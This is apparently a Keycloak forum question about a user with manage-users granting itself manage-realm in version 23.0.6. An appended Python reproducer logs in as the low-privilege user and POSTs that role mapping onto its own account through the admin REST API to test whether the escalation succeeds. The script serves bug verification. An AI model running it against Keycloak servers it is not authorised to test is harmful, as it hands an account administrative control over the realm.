Hi,
I’m seeing behavior in Keycloak 23.0.6 that seems to contradict the documentation where it states the following:
"Admins with the manage-users role will only be able to assign admin roles to users that they themselves have. So, if an admin has the manage-users role but doesn't have the manage-realm role, they will not be able to assign this role."
I've been testing this behavior out and found that if I assign the 'manage-users' role to user SupportUser (where SupportUser has these roles: manage-users, query-groups, query-users, view-users),
SupportUser is able to assign themselves higher-permissioned roles like manage-realm. Keycloak 24.0.2 functions as I would expect (it blocks a user from assigning a role greater than a role they themselves have). I wanted to check and see if this is a known issue with 23.0.6 that was in fact fixed, OR if there is something wrong with our current 23.0.6 deployment. We will likely be upgrading anyway, but I am hoping to get a definitive answer as to whether this was a bug.
Thanks,
Walter
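As an added example (not part of Walter's post and not Keycloak's own code), here is a small reproducer for the check the post is asking about. It has two parts: a model of the documented rule (a caller holding manage-users may map a realm-management role onto a user only if the caller effectively holds that role, directly or through a composite such as realm-admin), and a live attempt that resolves the ids with an admin account and then, as the low-privilege user, POSTs the role mapping onto its own account through the admin REST API. The composite map, the server URL, the realm names and the credentials (read from KC_* environment variables) are assumptions; the rule model follows the documentation quoted above, not Keycloak's source.

```python
"""Reproducer for the manage-users / manage-realm assignment check.

expected_decision() models the documented rule (assumption: it mirrors the
docs, not Keycloak's implementation). try_self_assign() drives a live server
through the admin REST API; connection details are assumptions taken from
environment variables.
"""
import json
import os
import urllib.error
import urllib.parse
import urllib.request

# Constructed, partial composite map for realm-management roles (assumption).
# The real set lives at /admin/realms/{realm}/clients/{id}/roles/{name}/composites.
REALM_MANAGEMENT_COMPOSITES = {
    "realm-admin": {"manage-users", "manage-realm", "view-users", "view-realm",
                    "manage-clients", "view-clients"},
    "view-users": {"query-users", "query-groups"},
}


def effective_roles(direct_roles, composites=REALM_MANAGEMENT_COMPOSITES):
    """Transitively expand composite roles into the set a caller really holds."""
    seen, stack = set(), list(direct_roles)
    while stack:
        role = stack.pop()
        if role not in seen:
            seen.add(role)
            stack.extend(composites.get(role, ()))
    return seen


def expected_decision(caller_roles, role_to_map, composites=REALM_MANAGEMENT_COMPOSITES):
    """Documented behaviour: True if the mapping should be permitted."""
    held = effective_roles(caller_roles, composites)
    if "manage-users" not in held:
        return False            # cannot change any user's role mappings at all
    return role_to_map in held  # may only hand out a role you already hold


def classify(status):
    """Turn the HTTP status of the mapping POST into a verdict."""
    return {204: "escalation succeeded", 403: "blocked as documented"}.get(
        status, f"unexpected status {status}")


def _token(base, realm, username, password):
    # Password grant against the built-in admin-cli public client.
    form = urllib.parse.urlencode({"grant_type": "password", "client_id": "admin-cli",
                                   "username": username, "password": password}).encode()
    with urllib.request.urlopen(f"{base}/realms/{realm}/protocol/openid-connect/token", form) as resp:
        return json.load(resp)["access_token"]


def _api(base, token, method, path, body=None):
    """Bearer-authenticated call; returns (status, parsed JSON or None)."""
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(base + path, data=data, method=method)
    req.add_header("Authorization", f"Bearer {token}")
    if body is not None:
        req.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(req) as resp:
            raw = resp.read()
            return resp.status, (json.loads(raw) if raw else None)
    except urllib.error.HTTPError as err:
        return err.code, None


def try_self_assign(base, realm, admin_user, admin_pass, user, password,
                    role_name="manage-realm", admin_realm="master"):
    """HTTP status the low-privilege user gets when mapping role_name onto itself."""
    admin = _token(base, admin_realm, admin_user, admin_pass)
    _, users = _api(base, admin, "GET",
                    f"/admin/realms/{realm}/users?exact=true&username={urllib.parse.quote(user)}")
    user_id = next(u["id"] for u in users if u["username"].lower() == user.lower())
    _, clients = _api(base, admin, "GET", f"/admin/realms/{realm}/clients?clientId=realm-management")
    client_id = clients[0]["id"]
    _, role = _api(base, admin, "GET", f"/admin/realms/{realm}/clients/{client_id}/roles/{role_name}")
    # The attempt itself is made with the low-privilege user's own token.
    low = _token(base, realm, user, password)
    status, _ = _api(base, low, "POST",
                     f"/admin/realms/{realm}/users/{user_id}/role-mappings/clients/{client_id}",
                     [{"id": role["id"], "name": role["name"]}])
    return status


if __name__ == "__main__":
    env = os.environ  # KC_BASE, KC_REALM, KC_ADMIN_USER, KC_ADMIN_PASS, KC_USER, KC_PASS are assumed names
    status = try_self_assign(env.get("KC_BASE", "http://localhost:8080"), env["KC_REALM"],
                             env["KC_ADMIN_USER"], env["KC_ADMIN_PASS"], env["KC_USER"], env["KC_PASS"])
    print(status, classify(status))
```

Run it once against each version with the same SupportUser: a 204 means the server accepted the self-assignment of manage-realm, a 403 means the check from the documentation is in force. The admin account is only used to look up ids, because a user with just query/view-users cannot list clients; the mapping call is made with the low-privilege token, which is the part that matters.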